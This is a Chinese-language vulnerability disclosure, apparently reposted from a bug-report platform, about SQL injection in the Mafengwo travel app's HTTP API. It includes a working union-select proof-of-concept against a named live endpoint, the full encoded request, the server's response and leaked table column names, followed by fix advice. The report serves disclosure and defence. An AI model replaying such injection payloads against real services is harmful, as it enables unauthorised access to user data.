蚂蜂窝手机应用背后的HTTP API接口存在SQL注入 漏洞 。 同时在这里,非常严肃非常严肃地提醒所有手机应用的开发者,在开发对应的与服务器通讯的API接口时,不要认为 加密 数据传输就能安全大吉、对参数不加验证就使用! 详细说明:蚂蜂窝有几个手机应用,其中之一为旅行家游记。 通过反编译apk,HdhCmsTest2cto测试数据 发现其与服务器的HTTP API通讯接口: http://HdhCmsTestmafengwo.cn/mobile/travelnotes/gettravels.php 虽然通讯过程采取了加密数据传输,但很容易模拟;其中通讯参数travels_id未经验证即进入SQL查询,导致SQL注入产生。 漏洞证明: 1、POC: travels_id为[778079 and 1=2 union select 0,char(97,98,97,98,97,97,97,98,98,98,97,99,97),0,0,0,0,0,0,0,0,0,0--](不含双引号)时的URL: http://HdhCmsTestmafengwo.cn/mobile/travelnotes/gettravels.php?r=%7B%22sign%22%3A%22f7c8542ddf4533a09874d4f829123049%22%2C%22data%22%3A%7B%22travels_id%22%3A%22778079+and+1%3D2+union+select+0%2Cchar%2897%2C98%2C97%2C98%2C97%2C97%2C97%2C98%2C98%2C98%2C97%2C99%2C97%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0--%22%2C%22device_id%22%3A%22a984355c5vt74g%22%7D%7D 返回: {"data":{"ret":1,"message":{"id":"ababaaabbbaca","content":"0","img_width":320,"img_list":[]}},"sign":"82b60326ab8a7bd4eb43912d371b34d0"} 2、证明注入问题存在证据:表travelguide_book含如下列: id,p_mddid,mddid,name,p_mdd_name,mdd_name,icon,icon_big,ver,type,fee,product_id,file,size,password,publish,download,ob,ctime,lasttime 修复方案: 检查所有API接口,是否存在未检查参数等(在普通页面已执行但API层未执行的安全措施)的漏洞。 其余建议见[问题描述]。 另外给数个漏洞外的建议: (1)请关闭服务器的错误显示 (2)请尽快升级用户 系统 ,原因和CSDN历史问题相似 作者horseluke
查看更多关于蚂蜂窝手机应用背后的HTTP API接口存在SQL注入漏洞的详细内容...